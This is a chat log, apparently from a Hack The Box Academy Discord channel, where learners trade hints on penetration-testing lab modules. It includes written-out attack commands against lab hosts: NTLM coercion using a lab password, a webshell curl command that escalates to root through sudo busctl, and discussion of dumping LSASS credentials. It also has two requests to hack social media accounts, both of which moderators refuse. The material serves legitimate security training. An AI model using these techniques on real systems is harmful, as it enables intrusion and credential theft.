#modules
kinda broke right now, but I plan on getting certified through htb once I get some extra money
OSCP is kinda what i was thinking..but for that cost, i want to be sure lol
When I was applying for jobs, a lot of the HR people asked me about it
I think HTB content is more thorough
but the OSCP is recognized as kind of a gate-keeping cert
yea thats kinda why i thought at least getting the OSCP may help, though i'd value the CPTS more i think
well like you, kinda broke so reluctant to spend too much money needlessly lol
I think both learning platforms have their benefits
honestly, I think HTB academy content is more thorough, but I do love being able to watch the videos of Offsec courses
yea most certs ive done over the last few years have been mostly through vids
so this has been a change for me
last year i got my JNCIA and Security+. very heavy on the vids/multi choice exams lol
nice!
oh yea? because theyre multi choice?
I had the Pentest+ and literally 0 people hiring asked me about it lol
I did a linkedin search and it had 0 job listings
theyre another gateway cert. i didnt mind them tbh
they're not bad at all
I just had a bad experience with pentest+ lol
and employers asking me what that was haha
hahaha. funny you mention it. my original plan was to do pentest+ end of this year as prep for more hands on. but then i saw a review on youtube for HTB and checked it out.
yeah I mean comptia is reputable
but pentest+ is a new cert and doesn't have much clout
hahaha well i see that one as more useful for some less-technical managers who need to know how it works but not being able to do a pentest
I think the CPTS is gaining traction
yea i think so. i mentioned it to a few others looking to get into the industry and they had heard about it recently too
i actually recommended to someone the other day to join up, do the skill paths like InfoSec fundamentals, Linux basics, then go to CyberDefenders and do their content and/or the CDSA
nice
honestly I think comptia is well known.. I've heard of Sec+ being required for jobs with the DoD
I just had a bad experience with Pentest+ lol
yea it is for a lot
i liked Sec+. i almost did Net+ but decided with JNCIA instead
i highly recommend JNCIA. it can be a little vendor specific to juniper but their content in general is more on the vendor-neutral side.
have you heard of CCNA?
its Juniper's equivalent to that
and juniper is all unix based which attracted me too lol
Could anyone help me with ntlm attack module?
I have some friends with the CCNA
they do like networking specific tasks
we might want to carry on this chat in private msgs
I dont want to flood the modules channel
yea, which is what its for. having some networking knowledge helps me in some of my jobs. i wanted to codify it in a cert and chose the JNCIA. glad i did tbh
need some help with: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass'.
In Shells & Payloads > Automating Payloads & Delivery with Metasploit. Is ||meterpreter|| not the command line interpreter used to establish a system shell session with the target as the first challenge question asks? Why is ||powershell|| the accepted answer there?
hey can anyone sanity check me on the skills assessment for advanced sql injection? I've dumped the db but am creating the wrong Reset key for some reason
small question about attacking common application skill assessment 2, i managed to get a reverse shell, but cant find the flag, tried to escalate to root, but the method is not working, any help? 😅
nvm it was a typo 
ok nvm the nvm, i cant find the flag 🙂 💔
hello guys im stuck here
Next, we can set the wley user as our starting node, select the Node Info tab and scroll down to Outbound Control Rights.
im searching outbound control rights but i dont see
select them, click them and see
either that or your collector didn't get everything properly
outbound object control
Hey guys can someone provide guidance for the last question of the Active Directory Trust Attacks - Skills Assessment? i really have no idea where to go
i have an evil-winrm console on dc04.mssp.ad as Administrator but i can't really query the fabricorp.ad domain and i can't seem to find any creds to move to fabricorp.ad
Ty
have you checked what other creds you can get from it?
yep, look for edges from that
ty
Hello everyone , i have a question
module : Kerberos Attacks
section : skill assessment
the last question, i am not able to connect to the DC using RDP to use tools like Rubeus, is there any other method?
evil-winrm
AD enum attack module
ACL Section
ACL enum page
last question
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
2 I can see about me but it doesn't accept it
Perform the search shown in the module, note you can use the Identity "GPO Management"
Bloodhound might not show the term that's expected
could anyone help me with ntlm relay attack coercer tool part: Use Coercer in 'coerce' mode against 172.16.117.60 and submit the name of the first RPC call resulting in the message '[+] (ERROR_BAD_NETPATH)' for the SMB named pipe '\PIPE\lsass
hm i use the powershell?
Yes
Use the tools and techniques shown in the section
Anyone got any tips on how to get the machine on 'Internal Password Spraying - from Windows' to work?
xfreerdp is just returning a black screen, rdesktop saying invalid creds. I did manage to get it to connect once using xfree but I made it fullscreen and the session bugged out and dropped 
Tried with kali and pwnbox same issue on both.
okey thank you
Press enter when black screen shows up
This is the 100th time someone's had that issue lmao
Thanks again
I checked discord history first and saw multiple people reported having this issue. Had tried using esc as someone had mentioned in a reply and it didnt work but enter worked once I was able to get it to connect.
20 mins to find out you need to press enter on the black screen then 20 seconds to get the answer to the question.
marcielee could I dm you about one module question?
can i send u a private message ?
No
hey can anyone explain to me unmanaged powershell? I am having a real tough time detecting it and would love some help.
in the analyzing evil module
just ask here
Can someone give me some hint on this question " What is the API key the inlanefreight.htb developers will be changing too?" INFORMATION GATHERING - WEB EDITION module. I've been using ffuf for the past 2 days and cant find any subdomains. Added IP into /etc/hosts. Using Seclists wordlist. What am I doing wrong?
ffuf -w /home/htb-ac-927183/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.www.inlanefreight.com" -u http://94.237.59.63
Where is the port
I tried with the port too but it didnt work
the port is needed
what do you need help with
ok knowing that the port is needed is a great help, saves me a ton of time. Am I using the right host? I've tried with the inlanefreight.htb but didnt find anything
i got annett.xxx credentials , and i have connected to x.x.x.35 using rdp , and i got the ticket of the service and make renew and pass the ticket , but i am not able to read the \\DC01\Secret Share\flag.txt
are you using the right ticket? did you try to coerce?
anyone having difficulties rdp to targets?
@next bronze I am trying to use coercer with responder but I only receive "no_auth_recieved" in the output of coercer
thank you !
did you check the klist output ?
i got it , thanks alot
probably because your responder isn't running
gg
didnt work
try /tls-seclevel:0
in the command xfreerdp /u: /p: /v: /tls-seclevel:0
still no workie
? huh i wonder what's going on with this
out of ideas , maybe re-spawn the target or contact the support
use rdesktop or remmina
may I ask you why the xfreerdp didn't work ?
I prefer to use it over the other tools
¯_(ツ)_/¯
@next bronze In the module I think they didn't mention any special responder configuration
I mean did you try putting the first name form \PIPE\lsass ?
Hi guys, anyone know what's going on on The Live Engagement challenge on SHELLS & PAYLOADS module ? the host-2 flag ? how can i upload a module on msfconsole
@next bronze in coercer command?
still having difficulties after git cloning the rdesktop doesnt find it
Is it meant to be .com?
I swear this assessment is .htb
Can’t discover any subdomain. This gotta be broken.
Or you're looking in the wrong place? What section are you doing
If it's the assessment; the domain is inlanefreight.htb
--help
You don't have to
Just use xxxx.rb
And it'll load
exactly, and make sure you set the correct info and run
Iirc if you forget to add a vhost it doesn't work
thanks, but is this obvious ?
Did you set all options correctly?
how do i install remmina and use it its not im not really getting it?
Pwnbox and parrot should have it installed by default
Otherwise it's likely in the repos with a sudo apt install
yeah all
whats the syntax structure to use it
Exit then reopen msfconsole and do it again
It's a gui tool
So just type remmina and it should just pop up the gui
Heyy, while doing the module Network Enumeration with nmap in the section of nmap scripts, I see that the machine has a ||DOS vulnerability on the smb||, could I try to exploit that, or would that be too intrusive?
No need for that
Ok gotcha, ty very much
hey marcie its failing
im in remmina tho
made a new profile
but no workie
reach out to support then ¯_(ツ)_/¯
Try --script vuln, also note which services are running
Or maybe discovery
made that, i changed the payload too to reverse and still have the same issue
Okok, I already tried it but it didn't seem to give me much besides the thing I mentioned
You don't need to change the payload
Are you using the right IP
Note which interface can connect to the target server
make sure to add vhost if exist
btw, I already found a flag, but I think it was the same as the one from the previous exercise, that's why I "ignored it"
HTB{8..6} is the flag, but it has nothing to do with DOS
Note what ports are open
Okok I will, ty very much for the help
need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it
WINDOWS PRIVILEGE ESCALATION
Windows Server
this chapter and module
i also dont have the help button on the bottom of the screen
yes the answer is in the output
need help. having some problem completing the windows attack and defense > credentials in share. for some reason i can't see the server01 and even the DC can't ping it. resending with attach SS
@next bronze thx I will try to specified the rpc call
Disable adblock
in my browser
just run the tool normally and look at the output
No, in your mind
i am stuck on pdf generator exploitation of injection attacks module. can someone who have done the section DM me to help please. Thnx
🫤
Ask dumb questions, get dumb answers
@next bronze you mean during the scan method or coerce method?
bud just run it and look at the RPC call names, use those as the answer
it's right there in the output
I have problems with the coerce part not the scan..not getting anyone coerced...
screenshot the output
there's nothing to spoil, the command to run it is already given in the module
either way the answer is in the screenshot
I am sure you are referring to the first question of the section... Not the second...And I have troubles with the second
I am referring to the second question
I am not getting any result with Error bad netpath
buddy, if you refuse to provide the command you used, or try the RPC call names in the screenshot, I can't help you
Recently completed the pivoting modules and there was not much content on double pivoting, basically only the RDP example. Now I am trying to do it with metasploit, trying to chain multiple reverse port forwards together back to attack box, but every time I add a new reverse port forward rule, the previous one gets deleted. Anyone else faced this ?
No, bc I use ligolo-ng
honestly I am thinking about giving up and learning about that one too, been trying for 2 hours to make this work with various workarounds
does it make it easy to set up double/triple pivots ?
Yes
You set your listener up to forward to your host
Repeat ad nauseum
You'll need to link up multiple ligoloX interfaces if you don't want to have to stop/start sessions
you might want to try with autoroute, i think i did use it for double pivoting
it does not seem to help me past second pivot
this is the topology, the idea is to get a meterpreter session with PIVOTWIN10, the last host on the right, so far I only managed to get meterpreter sessions with Ubuntu and server01 hosts
I wouldn't pivot with metasploit tbh, has been pretty unreliable from my experience
some of my notes, i'll not spawn the target at the moment but it seems to me I had access to the 172.16.6.0 network
ssh/chisel would be ideal, even better is ligolo as mentioned
sure, it is just i tried the stuff when doing the module.
and for Xoriath, i checked and i got a evil-winrm session on the last host, i do not see a meterpreter session
yeah, it's possible to get an rdp on it too, my idea was to sort of use metasploit as a c2, but I guess that's not really a thing for this
Hmmm alright, ligolo it is then. Chisel I would not know how to set up double pivot with it. I assume it is in the exam right, are we supposed to figure it out on our own ?
chisel you can dynamic the first tunnel and standard port forwarding the second
but yes ligolo would make this a lot easier
yeah there is some articles about it, like this one https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/
sorry if dumb question, is this how you would do it with chisel ?
Server on attack box, then chisel client on first pivot with socks option, then copy chisel binary to second pivot, start it as client there and start another chisel process as server on the first pivot ?
You'd set up a forward to route pivots back to your host
From host A you'd forward to attack box, then connect to B from A
And use the forwarded port
Ligolo is a lite c2 which allows remote management of the listeners (but not full command/control)
can anyone sanity check me for the advanced sql injection skills assessment? I dumped the db but for some reason the next step isnt working for me
Hey man did you work this out? Been having the same error. Tried restarting lab and increasing timeout but the SMB connection seems super slow.
Try changing vpn regions, respawning target
Will try, btw do you think it will make a difference if I try to mount it?
I don't think you can mount it
Considering it might be filesystem differences and such
Sorry I know I shouldn't talk about that here, but I got no choice. It's the only channel I can talk in so I think there is a problem
@next bronze Coercer coerce -t 172.16.117.60 -l 172.16.117.30 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -d inlanefreight.local -v --always-continue and for responder sudo python3 Responder.py -I ens192
no one of the output has this result: '[+] (ERROR_BAD_NETPATH)'
all the rpc calls have this result: (NO_AUTH_RECEIVED)
-u 'plaintext$' -p 'o6@ekK5#rlw2rAe' is this a valid account? have you checked?
so it's not a valid account
what you mean?
So You need to provide a valid username and password to authenticate to the host ?
did you try to add an account from the previous section instead of just copying the command given in the section
so it is necessary to make a post relay attack through ldap, create the host account and use it for this?
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.
Regarding this question above, I have dumped the process using volatility, used YARA to scan for malwares, used the cmdline plugin where I got an encoded command. I tried decoding it but couldn't.
I manually scrutinized the memory dump, tried several other things but still no head way.
All I am asking for is a hint, that'll help me move in the right direction.
you have an actual account created previously don't you? why just blindly copy and paste the commands in the module?
because for different reason I cannot do in a single row all the sections so the answer is NOT, I try always to understand what I am doing but if there is nothing explained about what are the criterias for the credentials needed...sorry not to ask myself to do in another way...
Yes
if the creds are not explicitly provided for you to use, or ones that you have created, you can assume they don't work
especially the accounts used in the sections, they're usually removed or disabled so that you have to follow what they did in the module instead of copy and pasting
yeah the question is to know if the error comes from the credentials or responder.conf file or whatever...is the first time I saw this tool so....
I am sure you have also copied and pasted in some moment mate!
"We can view the first archived version of HackTheBox by entering the page we are looking for into the Wayback Machine and selecting the earliest available capture date, being 2017-06-10 @ 04h23:01" -- am I the only one that can't see a snapshot for this date?
I actually don't
I have never used that plaintext$ account in the module because I assume it doesn't work
again I don't blindly copy commands without understanding what they do
Understanding what coercer is doing it is not relevant for assuming that the credentials provided in the example are not going to work! Maybe you assumed it, well done! But it doesn't mean that others are copying and pasting without thinking.
some call it blindly copying, I call it "dynamic analysis"
so which one are you 
try to assume ! you are really good on it
@next bronze no way dude, you helped me!! 🙂
🤦♂️ Thank you
hackthebox.eu/en specifically. haha
wow finally, no dumb banner on the top of the htb pages.
Hello guys
Good morning!/Good Evening!
I am doing the Oracle TNS module, it's so time consuming!
still running the "odat.py" script
It can take a bit of time
But make sure you didn't miss the user/pass
Once you get that you can stop it
Hey guys
I’m going through the Attacking Enterprise Network, I complete External Testing, but I don’t understand why we choose ||monitoring|| subdomain for testing more deeply, could you explain please?
Since you've presumably done the course content up to this point you should know this
Also: most people do this blind, so revealing the subdomain is spoiling
If he knew he wouldn’t ask
Yes, it's still enumerating that
Short answer: you check all found subdomains
Yes, I found all vuln on this subdomains. Only ||monitoring|| subdomain in our scope?
No: it's just literally common to check all of what you can do
Also redact the subdomain, since spoiling
The other thing is a subdomain can reveal the type of content that may be found
In this module, are we just not following the steps for deeper testing with other subdomains?
i need help with this question can anyone help me
What exactly have you tried?
I managed to mount it and copied the file onto my local system. Took about 30-60 minutes.. :D
The module is to test everything you’ve learned so far
gobuster dns found a subdomain w......7
did a gobuster on that subdomain nothing shows
did a dir search found some dir but nothing of value
used
The module shows you other things. Brute force does not always work
Take a look at the module. There are other things you can try
amass nothing
Anyone know how to use medusa to hack social media?
are you sure your command has a correct syntax? did you try multiple options? Do you get errors? Do you understand what you are spidering?
@honest tinsel hello
Hi
Think of AEN as a mock Exam
Take any point you can to move forward
<@&861185840277487616> , I suggest you don't ask
I know I need to bypass strong security measures
Okhhay@fathom pendant
Rate limiting etc
All you need to know is that it's illegal
that is not what HTB is for
if you're interested in that, I suggest you look elsewhere
Aware. But doing it to my own account
Doesn't matter
we don't teach or condone illegal activity
Trying to elevate to be an ethical hacker
You dont own your social media acc 😂
^
Also depending on the service they may have carveouts for you testing on your own account(s) but you do gotta read their bounty/vdp
Hello can we talk just casually 👀
This channel isn't for casual talk
#modules is for conversations related to Academy modules. There are more off-topic channels around, but in none of them do we accept users discussing illegal activity
(in a non-ironic manner)
sorry to be a killjoy
🙃
But idk why
I can't access general channel
please read #welcome , it will all make sense
i understand what its doing
ffuf also produces nothing
You have found a subdomain.
Apply all the techniques shown in the module to this subdomain. I think you will then find what you are looking for.
does the IPMI module's target machine takes a long time to be spawned?
I need to mount the VHD now that I've likely obtained the password. I thought of copy pasting to another VM which is Windows but it doesnt seem to work.
How would you approach this?
share the screenshot
Not much to share, I simply cannot copy/paste from one vm to another or to the host. Neither drag it
you can transfer the file over to a windows vm
A vm of my own right?
yes if you'd like to mount it in windows
But it seems that when I try to drag and drop or just ctrl c ctrl v the Backup.vhd file it wont
from where to where
From kali VM to windows VM
pretty sure inter vm copy and paste isn't possible for both vbox and vmware
you can use other methods to transfer files
Yeah.. Which one would you use?
mount a shared folder, http server, smb server, etc
I mean you can also copy the files to your host then to the windows vm
Yup tried that one but didn't seem to work.. But thanks I think I found a way :D
can anyone sanity check me?I'm trying to generate a secret key in the Advanced SQL Injection Skills Assessment and am not sure why it is saying my secret key is invalid
hmm.. i think I found my issue... fernflower and jdgui were decompiling the application differently
leading to completely different ways of generating secret keys
debugging it locally helped me see what was wrong
I wrote a script to dump the DB but one of the columns wont dump. if anyone could nudge i'd be forever in your debt 🙂
If it is specified to me that I should refrain from attacking the service or using exploits, does that mean I should stay away from nmap scripts too? -sV sC for example
I think it depends on the script
some nmap scripts do more than others
Aye, i figure just running version scan would be fine right?
version should be fine
all it does is look at the output from the connection
and compare it to known values
cool ty
ofcourse
im talking about in htb labs
you might want to get permission first on a real target 🙂
noted
NTLM Relay Attacks --> NTLMRelayx Use Cases. Question says "Use impacket's SOCKS server to hold RMONTY's relayed connections and abuse them to find an accessible shared folder on one of the relay targets; once connected to it, submit the contents of the file 'connections.txt'." RMONTY doesn't seem to have permission to access the share, but PETER does. Am I doing something wrong?
Some scripts don't do anything except just look at/crawl for common things
peter's is used for question 2
yeah i know
there should be a share where the other guy can access
i was able to get it using the interactive smb client
it's the same share, peter can just access it with smbexec, rmonty cannot
so i see now, i just didn't go far enough in the section
rmonty can access it via the interactive but not exec
ya
thanks
sad for us that ms is going to kill ntlm
i have a feeling environments will still have it 10+ years from now lol
Hi, I am attempting to get reverse shell from MSSQL utilizing xp_cmdshell, but when getting a file via HTTP server the request is never reached to the server; however, when running nc on kali, the request received !
I am using Ligolo, the MSSQL is in HOST02 and the flow is as this: HOST02 -> HOST01 -> Kali
Do you have a listener forwarding the request?
Yes
So you have a listener that would forward the http request to your kali machine?
And you're specifying the proper port
Yes
woo hoo figured it out 😄
iirc i could only get access with smbclient too
hows the module going?
its great! im learning a ton
was kinda stuck for a while because jdgui decompiled the code incorrectly
but after decompiling it with fernflower im making good progress 🙂
noice!
do you have java coding experience already?
so this is a neat experience
only doing code review for vulnerable functions/obvious vulnerabilities
i actually have the Whitebox pentest module on favourites as well lol.
yeah that module was great too! 🙂
ah ok. i was just curious how much coding exp you need to do that kind of debug/review.
honestly I dont think you need much
i was leaning that way but wasnt entirely sure.
oh, i havent thought of using chatgpt for that. interesting
hello guys, how are you? I am having problems with the Perfection machine... it does not respond to the execution of commands, can someone guide me a little?
thats how I've been learning to code well 🙂
err not well, but better
I read the code, and then when I get stumped I asked chat gpt what does this mean?
and then after just going through a bunch of code it becomes 2nd nature
i know of some ppl who used chatgpt to help with a scaffold script for some python stuff. they said it wasn't 100%, but was a good base to then modify.
great to know! fountain of knowledge mate lol
yeah chat gpt is definitely a tool. I'd check over its accuracy like I would a child
but its great for gaining some insight
I think the whitebox module talks about using it
to review the code
That's a starting point machine yeah? #starting-point (read and follow #welcome )
perfection is a retired machine
tbh, i'm not a fan of ppl relying too heavily on genAI tools. i dont think its substitutes for foundational knowledge. but as an aid i'm all for it.
Ah
Still applies to read and follow #welcome to access it
I use chat gpt+ ghidra output to learn reverse engineering... it has been priceless
It all depends on how you use it
agreed!
too often i've had ppl just say 'can't we just get some AI/ML to do that' without understanding that good quality data is everything...models drift. and it doesn't substitute for having trained personnel.
but i may use it for some hints/push like LonelyOrphan has used it. will definitely be helpful there
yea and I heard it gets worse if you have 1 model interacting with another. i've also had to shutdown that before.
on another note, this AD attack module has been super interesting!
interesting
would explain why our AI expert has a masters in applied mathematics. haha
which is definitely not my strong suit 😆
I really like the ADCS and ntlmrelaying modules, even though microsoft recently announced they were deprecating ntlm
ah, that makes sense though. as i've been going through, it just seems like its so susceptible to abuse
though HTB is obviously showing easier targets to reinforce training/learning.
yea definitely. all of the corp environments ive been in obviously use AD. im taking my time with this module. want to make sure i understand it.
30000 dimension matrices
(on the light end)
Can someone give hint on this question please? "What is the API key the inlanefreight.htb developers will be changing too?" It's a skills assessment on Information Gathering - Web Edition, last question. I found 2 additional subdomains and added them into /etc/hosts. Ran ./finalrecon.py --full --url http://inlanefreight.htb and cant find any API.
well out of my league haha
you need to go deeper
look for subdomains (and perhaps another)
I’ve tried running finalrecon on both subdomains that I found (we**** and de***) and nothing…Show me the way 😦
Does anybody know anyone that could help me get the email and password for a Instagram account or outlook for Free
did you try the spider? (the one provided by the module)
no read #rules
reconspider yes. I couldnt make that one work for some reason but I am gonna try harder now when you pointed out. Thanks
did you sudo pip install scrapy ? that's the only python submodule i needed to install to get it working
it also helps to have the subdomains in your /etc/hosts file
yeah but that pwnbox on HTB is so bugged, nothing works. Gonna try on my kali now
worked fine for me ¯_(ツ)_/¯
also to answer your question from earlier: the port does not go in /etc/hosts
you need to specify it in your command http://url:port
http defaults to 80, which this server isn't running it on
add --break-system-packages as said in the error
also i did not invite you to DM me
Intermediate Network Traffic Analysis, Peculiar DNS traffic. This module states the first step after a DNS query initiation is a local cache check. That is incorrect for a Windows machine, it should be that the Windows machine first checks to see if the hostname is its own, and then it checks the hosts file, and then the local cache. Am I wrong?
the microsoft documentation conflicts with what the module says
i believe for linux the order is determined by nsswitch.conf, but generally it checks the hosts file first then the local cache which would make it incorrect for linux as well
Oh sorry I don’t use Discord much, had no idea it was illegal to dm you. My bad
just ask first and I believe I told you no earlier
I don’t think you told me no since I never asked but ok will ask next time
it's in the server rules
too late now, the police are on their way
as said reconspider should work, you just need to remember to specify the port
it's likely why finalspider wasn't working, you didn't specify the port for it to connect to, since 80 isn't the one hosting the service
Got it! Thank you so much! ❤️
anyone having issues with targets spawning?
hey guys! I'm having a bit of trouble with the last flag for the advanced sqli injection skills assessment. I've tried both ways of RCE mentioned in the module, along with a modified automated script. If anyone could sanity check me i'd be very grateful 🙂
Thank you!! I just spent 1.5 hours to fix this problem……
no
Yes, check this webpage 'https://github.com/simran-sankhala/Pentest-Tomcat' , paragraph "manual method"
Hi amigos. Hope you all having an excellent weekend. I have a question regarding enrolled paths. I am currently enrolled in the Bug Bounty Hunter path and have finalized 70% of the modules. But I have seen the new path Senior Web Penetration tester and i feel this one will teach better skills than the Bug Bounty Hunter path. Do you think it is wise to just jump to a new path and continue from there? This will also help me as the Senior Web Pen path is much more expensive thus i could use the cubes I have to do this one. Any input is welcome. thank you all
I feel like if you’ve already done 70% you might as well finish the path. The remaining cubes you need for the last 30% are probably less than the cost of a single module of the cwee path.
Now if you already know everything you’d be learning in the last 30% you could save the cubes and start going for the advanced cwee modules, but as you already noticed they are much more expensive and if you are a platinum sub you can only do 2 per month
did anyone complete attacking common services module
none of the lab is working for me
cant find any open ports
even with -Pn and -p-
yes this is the case. You are correct. it is around 320 cubes to finish the whole bug bounty path. Why not finish it and then move on. This will open only 2 senior web pen modules. Do you know why we have 15 modules in Senior Web pen tester each at 100 cubes but the course is estimated at 7500 cubes?
the maths dont really add up or I am missing some info?
which one? easy/medium/hard?
i agree with the others. you may as well finish the CBBH path. unless you're already a very experienced web pentester, it'd be best to start with CBBH and then move on
actually i mean the in section exercises
none of them working
Did you connect vpn?
ah ok. unsure. i couldnt spawn a target for hours.
when thats happened to me, ive had to reset the target
i know one of them was broken as i went online to find some walkthroughs and the particular port was closed for me, but was most definitely meant to be open
well it could be buggy like the 1 i had
otherwise im unsure. you may have to look for some help. i used youtube a few times to give me a nudge or google couldnt help
its 15 modules at 500 cubes each, but you get 100 cubes back for each you finish
you know any source where i can get walk through for this module?
the course is the best walkthrough. If the lab is really not working it is likely a support issue. Which section are you on? If you want I can try to spin up the lab and see if it works from here
after spawning the target many many times,i got one which is working
but it only works on attackbox
not vpn
did you try to redownload a vpn configuration file, maybe checking for another region with less load, switching to tcp?
I will try
also many basic tools like crackmapexec isnt on attackbox
and when installing them with apt it shows error
i do not use attackbox, it should be there tho. you can try to install netexec since crackmapexec is no longer maintained
https://github.com/Pennyw0rth/NetExec
ok
i just checked and netexec is already on the pwnbox
hello, i m doing the CBBH, more precisely, i'm doing the Information Gathering room and i'm at the Web Archives, but i can't answer to the first two questions, if someone can help me please
cant help you. just had a look and the questions are different
"How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234. "
"How many members did HackTheBox have on the 10th June 2017? Answer with an integer, eg 1234. "
You don't have this questions ?
i do. but i did that section before the update, and my answers dont match the question
okay so how can i answer ?
not sure sorry. im not able to go back over the section and re-do it, right now.
The module shows you how you can view websites from the past. Use this knowledge to access the information
yeah it s what i did i was able to answer to the following questions, but not the first two
Have a look at the website of the date mentioned and search for the information there.
yeah it s what i did too but it isn't working for hackthebox.com website
but for facebook.com, paypal.com... it worked
you may want to check closer the screenshot in the section
okay i think i got it
yeah maybe just delete this post, so the fun isnt spoiled for other searchers : )
okay sorry but thank you very much !
Hi, currently doing the metasploit module and I'm on the payloads section. Basically, I got an Apache Druid service running, and I selected the exploit with the correct payload, but no matter what port I choose, or even what payload I choose, I always get an "Exploit completed, but no session was created." error. I had this before, and usually all I had to do was just switch payloads, but I went through every single one and get the same error. Whats the reason for this?
My LHOST is set to tun0
Alright solved, just NEVER use meterpreter payloads apparently, just use regular shells
did you set the LHOST to your tun0?
that looks like it's your normal VBox IP
not the IP assigned by htb (which is a 10.10.0.0/16 address
(there's routing that restricts access and such
and if that can help, i got this from metasploit github issues:
You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.
You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.
tbh; it just looks like they used the wrong IP as their LHOST
also the exploit completed which means it worked, however no session was created because the remote host couldn't call back to their box
yes i did as i mentioned, because i know thats a common mistake, but once i switched to a regular shell payload everything worked fine
ya thanks, ill use that for trouble shooting in the future, from my research its because meterpreter payloads are unreliable these days
Hello, has anyone finished the crackmapexec skill assessment first question? I have followed the hint, but still, I am not able to enumerate the users. I have also seen the HTB forums, and I am not able to make --rid-brute
your LHOST IP in the screenshot doesn't look like the tun0 IP is why I asked lol; 10.0.2.15 isn't an HTB tun IP afaik
Take another close look at the option in the module. The module mentions one thing in passing, but it is important here
not getting reverse shell
what might be the reason
Windows Priv Esc Module ; DNSAdmins section
I had to use sc.exe and not just sc to restart the dns
GOT iT
Needed some help in Blurry machine, is evaluate_models.py supposed to be writable? Its giving operation not permitted
yeah when using powershell you need to add the .exe extension
Module Linux Privilege Escalation - flag 5 -
I have managed to launch a webshell (https://github.com/simran-sankhala/Pentest-Tomcat/blob/main/README.md) to get flag4. Thanks to https://gtfobins.github.io/gtfobins/busctl/ and the fact that busctl has sudo rights, I should be able to escalate my privileges from Tomcat to Root. The thing is that the webshell does not respond to the command given (curl -u xxx : xxx http://localhost:8080/webshell/ -X POST -d 'cmd=sudo /usr/bin/busctl --show-machine \n !/bin/sh' ). Can anybody help ?
hi. If i take a memory dump of the lsass process (via the task manager for example) I can then use mimikatz to dump the hashes from the memory dump?
or i can use mimikatz to dump the hashes directly from the lsass process in memory. Correct?
mimikatz just dumps it depending on what submodule you use
ok. but it can dump from a saved file?
the idea of dumping the process and analyzing it on your system is to basically take the process off the machine
just need to call the right module
not sure, you can google though
ah yes makes sense. so would be to use pypykatz on my machine for example
Hi Everyone - can anyone assist with this really basic query?
Windows Fundamentals - Introduction to Windows
I've RDP'd in using xfreerdp
However I am unable to get any details using the "Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber" command as stated on the page.
I keep getting an error message "Get-WmiObject" is not recognized as an internal or external command, operable program or batch file.
I've tried this using xfreerdp on PwnBox and also using Remmina via OpenVPN but cannot seem to get it to work.
Any assistance would be greatly appreciated.
Have a great day
yeah the mimikatz submodule for it doesn't require you to have a file, because it grabs it from the machine itself
are u using a powershell?
you need to use powershell
Get-WMIObject is a powershell command
https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz @zealous rune to answer your question
in the module password attacks/attacking lsass, all the procedure is explained. It shows you can dump lsass via task manager then using pypykatz on linux to extract the creds
he was asking about using mimikatz on the windows machine
@wraith pelican indeed I understand that thx. I wanted to know if mimikatz on windows could be used to dump hashes from a previously dumped file
which isn't covered
my bad, i'm sorry
in future @zealous rune just utilize google
i'm not quite sure where you are or what you are doing. is it the skill assessment?
yes, flag5
ok i didn't do it this way. I got one way via ssh only, and one way via a webshell from wordpress but then it falls back to a user and ssh. Curious to see if this will work, keep me posted. And another thing, maybe check if another busctl gtfobin will work.
Can you tell a bit more about your way ?
probably best for dms since can be spoiler
just escalating from a user to another using the first ssh session as htb-student
Do you mean that you have found Tomcat's password ?
yes i got it
So you have flag4 + a password to switch user from barry to tomcat
Guys i'm having an issue with running Reconspider.py from the information gathering - creepy crawlies module, has this issue occurred to any of y'all? i've followed the steps in the module carefully but this error keeps appearing
but yeah we might as well continue in DM and remove all those messages
what does DM mean ? But yes, how do I contact you ?
i sent you a direct message
pip install scrapy
i've also tried it on the htb pwnbox but i couldn't do it either
add --break-system-packages as stated by the note
find / -name "EXTERNALLY-MANAGED" it's one of those files added by python install
That worked! it's just the reconspider.py that gives the same error message
Whatsup peoples 👋
try with sudo
there's also the "To install Python packages system-wide try 'pacman -S python-xyz', where xyz is the package you are trying to install"
i mean install scrapy with sudo
you goober
or install the package with pacman, as also stated by the message
reading is literally half the battle here
Wondering, would this be the correct channel to post in if you would like a hint regarding a module
Seems like it, but just wanted to be sure
yes
Thanks, i have been trying to get through the cpts job role path by myself as much as possible but I have been stuck on 2 modules for a couple days.. currently stuck on subdomain bruteforce
2 tips on getting the best help:
Include the module you're on, and the section
include what you've tried
Most people are getting through the CPTS path by themselves
tl;dr just get to the point of what you're stuck on and where
i've tried it with pacman but python-scrapy doesn't exist
then sudo pip install scrapy --break-system-packages
you can delete the externally managed file but you'd need to find it first
might be python3-scrapy, like in apt?
likely
good thing to do is apt search <stuff>, it will likely exist in pacman
hi, i'm doing the information gathering - web edition, i'm at the skills assessment part, there is only this question left : What is the API key in the hidden admin directory that you have discovered on the target system? If someone can help me to answer please
check for robots
i found this, could it be the one?
yeah i found /ad.......
yeah... so visit that page/dir
yep
that just prevents you from needing to add the --break-system-packages
i'm so bad i couldn't access it because i hadn't specified the machine port because it disappears when you access the site. Thanks for helping me !
okay so i delete the externally-managed and then try again right
js to make sure
nvm i got it
appreciate the help marcie!
the real command is --break-other-people-system-packages.........
Hi all, on cpts information gathering web edition page 7 subdomain brute forcing.. from the wording of the question I understand that I am supposed to run a bruteforce on the already found subdomains to uncover the missing subdomains. Is that correct?
I already have completed this module (Broken Authentication) but after update I cannot check whether my answer is correct or not because old answers are already filled.
So what should I do to check my answer?
hello, i get what you mean about the question. just focus on the part:" find any missing subdomains by brute-forcing possible domain names."
thanks
did you figure it out?
Still working on it.. going through all the wordlists in the seclist DNS folder again for the main domain
you might want to focus on those in the course
